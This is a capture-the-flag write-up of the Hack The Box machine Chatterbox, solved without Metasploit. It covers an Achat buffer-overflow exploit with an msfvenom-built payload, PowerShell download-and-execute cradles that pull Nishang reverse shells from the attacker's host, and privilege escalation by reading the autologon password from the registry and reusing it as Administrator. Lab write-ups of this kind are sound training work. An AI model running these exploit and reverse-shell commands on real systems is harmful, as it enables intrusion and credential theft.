Hack The Box — Chatterbox— without Metasploit (TJNull’s list for OSCP)
This is my 31st write-up for Chatterbox, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.
In a general penetration test or a CTF, there are usually 3 major phases that are involved.
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
First, let’s run an nmap scan on default ports to see what services are running on the target system.
nmap -sC -sV -O -Pn -p- -oA nmap/all_ports chatterbox.htb
So, we have SMB server running on ports 139 and 445, other than that we have Achat server running on port 9256 and its HTTP on 9255.
Let’s see what we have on the HTTP server.
The page appears to be blank. So, nothing much here.
Initial Foothold
Let’s search for Achat exploits in searchsploit.
searchsploit achat
We will be using the first one, since it’s a python script not metasploit’s ruby module.
Let’s mirror this exploit to current directory.
searchsploit -m windows/remote/36025.pyLet’s review the code.
Judging by the code, it looks like a standard BufferOverflow Python code. And the comment tells us that the payload is actually for executing calc.exe command on the target.
What we need to do is actually copy the commented command and modify it to a powershell reverse shell and execute that command to get the payload for this python script, as follows.
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=10.10.16.5 LPORT=4242 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
But as we generate the payload there’s something small to notice, that is, the payload size we have is 3694 bytes. But, if we look into the code.
It tells us that the maximum payload size is 1152 bytes. So, our generated payload must be smaller than that, otherwise it will not work as expected because of the overwriting of EIP register (If you know what buffer overflow actually is).
Let’s create our own staged payload. We will get a PowerShell reverse shell off the shelf from Nishang shells and then we will use msfvenom to create a payload that executes and fetches the actual shell code from our attacking machine and run it.
So, first let’s search for PowerShell shell code. I will be using Invoke-PowerShellTCP.ps1
locate Invoke-PowerShellTCP.ps1
Copy it to our current directory as nishangshell.ps1
cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 nishanghshell.ps1Let’s edit it and add the following line at the end of the shell script.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.5 -Port 4242Where IPAddress is the address of our attacking machine and Port is the port we will be listening on.
Let’s host this directory to HTTP server using python module.
python3 -m http.server 80
Since we know the powershell command that downloads and execute the shell script is as follows:
iex(new-object net.webclient).downloadstring('http://10.10.16.5:80/nishangshell.ps1')We will use this command in msfvenom to get the payload for our python exploit. Let’s copy the commented command in the python script and modify the CMD parameter in it, so that it looks something like that.
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell -c IEX(New-Object net.webclient).downloadstring('http://10.10.16.5:80/nishangshell.ps1')" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
We have a payload size of 694 bytes. That is doable. Let’s copy the generated payload from here and overwrite the ones in the python exploit.
If we scroll down in the python script we also see the target server address. Edit that to our target. In my case I have put the IP of the machine in my /etc/hosts and given it the domain name chatterbox.htb so I will simply be using that. You can use the target IP here.
Now, we have our python exploit ready, embedded with the payload that calls to our own HTTP server hosting the Powershell reverse shell (nishangshell.ps1).
Let’s start a listener on port 4242 since we configured the nishangeshell.ps1 to make a reverse connection to that port.
rlwrap nc -lvnp 4242
All set! Let’s run our python script.
python2 36025.py
As we run our python exploit.
We get a hit on our HTTP server that’s hosting nishangshell.ps1. It downloads the shell from our HTTP server and executes it.
And we get a reverse shell as user alfred.
(That’s how the staged shells work in the background).
Privilege Escalation
Let’s see our privileges first.
whoami /priv
We don’t have impersonation enabled. No juicy potato attacks would work I guess.
Let’s see system info.
systeminfo
We have Windows 7 SP1 running, but there are 183 Hotfixes Installed. Which means, it’s highly unlikely we would get a kernel exploit that privilege escalates for us.
Let’s enumerate the box further. There’s this script called PowerUp.ps1 that did a good job in my case.
locate PowerUp.ps1
Let’s copy it to our current directory that’s already being hosted by our HTTP server.
cp /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 .Once copied to the directory and hosted on HTTP server. Let’s get it and run in on the target, again by using the same powershell command we used to craft our msfvenom payload.
iex(new-object net.webclient).downloadstring('http://10.10.16.5:80/PowerUp.ps1')
As soon as we run this we don’t get any results but,
We again got a hit on our HTTP server for PowerUP.ps1
It got loaded actually. We need to execute one more command on the target to get it executed.
Invoke-AllChecks
It gives us the DefaultPassowrd for Alfred. Default password is actually set for automatic login. When you set your Windows machine to automatically login without asking for password. It’s not like your machine don’t have a password, but it gets stored in the registery; and Windows gets logged in automatically using that DefaultUserName and DefaultPassword fields in the registery.
You can also get these registry values manually by issuing the following the commands in powershell:
# FOR DEFAULT USER
(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -ErrorAction SilentlyContinue).DefaultUserName
# FOR DEFAULT PASSWORD
(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -ErrorAction SilentlyContinue).DefaultPassword
Now, we have the default credentials of Alfred. Let’s try using these credentials against the user Administrator since password reuse is a very common thing that people do.
We gonna store our Credentials in a secure string (some requirement that powershell has, I came to know about after I looked into it). Then we will send another shell back to our attacking machine from our target using these new credentials.
To save the credentials as secure strings we need to do the following.
$password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('Administrator', $password)In the first command we convert the plain password in secure string and stored it in the variable $password . Then in the second command we create a PSCredential Object $cred with username Administrator and password set to our previously created variable $password.
Now let’s copy the nishangeshell.ps1 on our attacking machine and edit the last line to get this new elevated shell on a different port.
cp nishangshell.ps1 nishell.ps1
I am gonna receive my new elevated shell on port 8080.
Now, let’s start a listener on port 8080 and send a request from our target machine to get this new nishell.ps1 script and execute it with the credentials stored in $creds.
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.5:80/nishell.ps1')" -Credential $cred
As we execute this command on the target.
Our webserver gets a hit for nishell.ps1
And we get an Administrator Shell!
:)
